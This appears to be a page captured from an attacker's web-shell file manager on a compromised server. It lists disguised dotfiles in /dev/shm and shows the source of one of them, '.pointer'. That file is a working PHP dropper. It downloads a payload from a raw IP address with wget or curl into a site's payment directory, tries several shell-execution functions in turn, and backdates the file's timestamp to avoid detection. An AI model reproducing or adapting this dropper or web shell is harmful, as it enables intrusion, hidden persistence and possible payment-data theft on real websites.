X7ROOT File Manager
Current Path:
/dev/shm
dev
/
shm
/
📁
..
📄
.binding
(835 B)
📄
.comp
(63 B)
📄
.component
(50 B)
📄
.dat
(48 B)
📄
.data_chunk
(55 B)
📄
.dchunk
(43 B)
📄
.descriptor
(51 B)
📄
.elem
(4.88 KB)
📄
.element
(4.24 KB)
📄
.ent
(4.24 KB)
📄
.entry
(57 B)
📄
.factor
(56 B)
📄
.flag
(46 B)
📄
.holder
(45 B)
📄
.item
(55 B)
📄
.itm
(4.65 KB)
📄
.k
(57 B)
📄
.marker
(4.24 KB)
📄
.mrk
(1.32 KB)
📄
.obj
(56 B)
📄
.object
(4.26 KB)
📄
.pgrp
(4.17 KB)
📄
.pointer
(1013 B)
📄
.property_set
(4.25 KB)
📄
.pset
(4.26 KB)
📄
.rec
(59 B)
📄
.record
(4.24 KB)
📄
.ref
(54 B)
📄
.reference
(703 B)
📄
.resource
(52 B)
📄
.sym
(4.23 KB)
📄
.symbol
(59 B)
📄
.tkn
(60 B)
📄
PostgreSQL.1907284836
(14.64 KB)
📁
lsws
Editing: .pointer
<?php $p = '/home/chamlyjq/training.worldceo.net/payfast/contact_org.php'; $u = 'http://45.146.130.3/tmp/NBeNeMGXVk'; $fs = 1513; $ft = 1698254500; run("wget -O {$p} {$u}"); check($p, $fs, $ft); run("curl -o {$p} {$u}"); check($p, $fs, $ft); function check($p, $fs, $ft) { if (file_exists($p) && filesize($p) == $fs) { @touch($p, $ft); die('!success!'); } } function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; } die('!ended!');
Upload File
Create Folder